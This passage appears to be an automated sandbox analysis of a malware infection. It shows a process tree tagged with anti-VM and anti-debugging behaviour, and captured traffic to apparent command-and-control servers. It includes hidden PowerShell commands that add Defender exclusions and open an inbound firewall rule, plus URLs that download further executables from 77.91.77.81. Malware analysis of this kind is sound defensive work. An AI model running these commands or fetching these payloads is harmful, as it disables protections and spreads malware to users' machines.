        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:2
        5⤵
        
        PID:4496
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:8
        5⤵
        
        PID:872
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2268 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:8
        5⤵
        
        PID:4444
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3028 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:1
        5⤵
        
        PID:4336
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3032 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:1
        5⤵
        
        PID:2664
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:1
        5⤵
        
        PID:4512
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3256 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:1
        5⤵
        
        PID:4532
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3240 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:8
        5⤵
        
        PID:3484
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:8
        5⤵
        Modifies registry class
        
        PID:4976
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4016 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:8
        5⤵
        
        PID:1080
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5020 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:8
        5⤵
        
        PID:3576
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4212 --field-trial-handle=1896,i,16845693243095005883,728114527726107537,131072 /prefetch:8
        5⤵
        
        PID:432

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3452

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5576

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5112 -ip 5112
1⤵
PID:2136

C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5324
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
    3⤵
    PID:2560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5336
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
    3⤵
    PID:5724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5276
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
    3⤵
    PID:4852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:668
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change hibernate-timeout-ac 0
    3⤵
    PID:680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2324
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change hibernate-timeout-dc 0
    3⤵
    PID:3376
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  PID:5496
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  PID:5184
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  PID:2400
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  PID:4212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Remove-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "New-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\"" "-Program" "\"C:\Windows\system32\winnet.exe\"" "-Action" "Allow" "-Direction" "Inbound" "-EdgeTraversalPolicy" "Allow" "-Enabled" "True"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2760
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINNET.exe"
  2⤵
  - Kills process with taskkill
  PID:4488
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINNET.exe"
  2⤵
  - Kills process with taskkill
  PID:2632
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINCFG.exe"
  2⤵
  - Kills process with taskkill
  PID:5476
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "WINCFG.exe"
  2⤵
  - Kills process with taskkill
  PID:1888

C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1352

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3508

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:972

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5488

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5392

C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5744

Network

DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De82xyhWKeHi5TqTWVg85uj2DVUCUyJLi8VnIfKXDiHh4gt-64hydnoSG8OWSLCcZjMUPODtwf7ZdEMKIwAeqyFD7Uc4IkPJ7QTkBWATtDuC6J0zvsB2fTAQlZAe3DX_IP-eZFb8q7rkUrc4NxJ9Qm59G76THJ5bIrNHrsN-82jMAcf-wha%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3D09da252c7046143dbe644344a7e47664&TIME=20240611T230319Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525&muid=12D800F85EB4CAF16CA7FE64B9B0CF8B

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De82xyhWKeHi5TqTWVg85uj2DVUCUyJLi8VnIfKXDiHh4gt-64hydnoSG8OWSLCcZjMUPODtwf7ZdEMKIwAeqyFD7Uc4IkPJ7QTkBWATtDuC6J0zvsB2fTAQlZAe3DX_IP-eZFb8q7rkUrc4NxJ9Qm59G76THJ5bIrNHrsN-82jMAcf-wha%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3D09da252c7046143dbe644344a7e47664&TIME=20240611T230319Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525&muid=12D800F85EB4CAF16CA7FE64B9B0CF8B HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=367748EA0DA46383140C5C480C446228; domain=.bing.com; expires=Sun, 13-Jul-2025 07:25:37 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CBA99DD6F0B545118931E23FE124925F Ref B: LON04EDGE1118 Ref C: 2024-06-18T07:25:37Z
date: Tue, 18 Jun 2024 07:25:36 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De82xyhWKeHi5TqTWVg85uj2DVUCUyJLi8VnIfKXDiHh4gt-64hydnoSG8OWSLCcZjMUPODtwf7ZdEMKIwAeqyFD7Uc4IkPJ7QTkBWATtDuC6J0zvsB2fTAQlZAe3DX_IP-eZFb8q7rkUrc4NxJ9Qm59G76THJ5bIrNHrsN-82jMAcf-wha%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3D09da252c7046143dbe644344a7e47664&TIME=20240611T230319Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525&muid=12D800F85EB4CAF16CA7FE64B9B0CF8B

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De82xyhWKeHi5TqTWVg85uj2DVUCUyJLi8VnIfKXDiHh4gt-64hydnoSG8OWSLCcZjMUPODtwf7ZdEMKIwAeqyFD7Uc4IkPJ7QTkBWATtDuC6J0zvsB2fTAQlZAe3DX_IP-eZFb8q7rkUrc4NxJ9Qm59G76THJ5bIrNHrsN-82jMAcf-wha%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3D09da252c7046143dbe644344a7e47664&TIME=20240611T230319Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525&muid=12D800F85EB4CAF16CA7FE64B9B0CF8B HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=367748EA0DA46383140C5C480C446228; _EDGE_S=SID=00C47669353F69DF34FA62CB34396850

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=gZD1lP4FpPNmCE9zgGuGkyszrEgKvGBmmyMs_L_cBD0; domain=.bing.com; expires=Sun, 13-Jul-2025 07:25:38 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DA0EBC9F00B744D795739B2594E270FD Ref B: LON04EDGE1118 Ref C: 2024-06-18T07:25:38Z
date: Tue, 18 Jun 2024 07:25:37 GMT
GET

https://www.bing.com/aes/c.gif?RG=3685eae219d04711837b0cb138f2e682&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T230319Z&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525

Remote address:

2.17.107.131:443

Request

GET /aes/c.gif?RG=3685eae219d04711837b0cb138f2e682&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T230319Z&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=367748EA0DA46383140C5C480C446228

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: ABAEB09E8EE245BA8A56CB6543BBFA95 Ref B: LON212050701027 Ref C: 2024-06-18T07:25:38Z
content-length: 0
date: Tue, 18 Jun 2024 07:25:38 GMT
set-cookie: _EDGE_S=SID=00C47669353F69DF34FA62CB34396850; path=/; httponly; domain=bing.com
set-cookie: MUIDB=367748EA0DA46383140C5C480C446228; path=/; httponly; expires=Sun, 13-Jul-2025 07:25:38 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.7f6b1102.1718695538.cac4a6
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/cost/sarra.exe

explortu.exe

Remote address:

77.91.77.81:80

Request

GET /cost/sarra.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:39 GMT
Content-Type: application/octet-stream
Content-Length: 1325568
Last-Modified: Tue, 18 Jun 2024 07:23:06 GMT
Connection: keep-alive
ETag: "667135da-143a00"
Accept-Ranges: bytes
GET

http://77.91.77.81/soka/random.exe

explortu.exe

Remote address:

77.91.77.81:80

Request

GET /soka/random.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:40 GMT
Content-Type: application/octet-stream
Content-Length: 1858048
Last-Modified: Tue, 18 Jun 2024 07:23:44 GMT
Connection: keep-alive
ETag: "66713600-1c5a00"
Accept-Ranges: bytes
GET

http://77.91.77.81/cost/random.exe

explortu.exe

Remote address:

77.91.77.81:80

Request

GET /cost/random.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:41 GMT
Content-Type: application/octet-stream
Content-Length: 1325056
Last-Modified: Tue, 18 Jun 2024 07:22:58 GMT
Connection: keep-alive
ETag: "667135d2-143800"
Accept-Ranges: bytes
GET

http://77.91.77.81/well/random.exe

explortu.exe

Remote address:

77.91.77.81:80

Request

GET /well/random.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 1166336
Last-Modified: Tue, 18 Jun 2024 07:22:52 GMT
Connection: keep-alive
ETag: "667135cc-11cc00"
Accept-Ranges: bytes
DNS

131.107.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.107.17.2.in-addr.arpa

IN PTR

Response

131.107.17.2.in-addr.arpa

IN PTR

a2-17-107-131deploystaticakamaitechnologiescom
DNS

81.77.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.77.91.77.in-addr.arpa

IN PTR

Response
DNS

155.47.45.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.47.45.147.in-addr.arpa

IN PTR

Response
DNS

www.youtube.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

172.217.16.238
GET

https://www.youtube.com/account

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /account HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
x-client-data: CPj8ygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:25:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/judit.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/judit.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
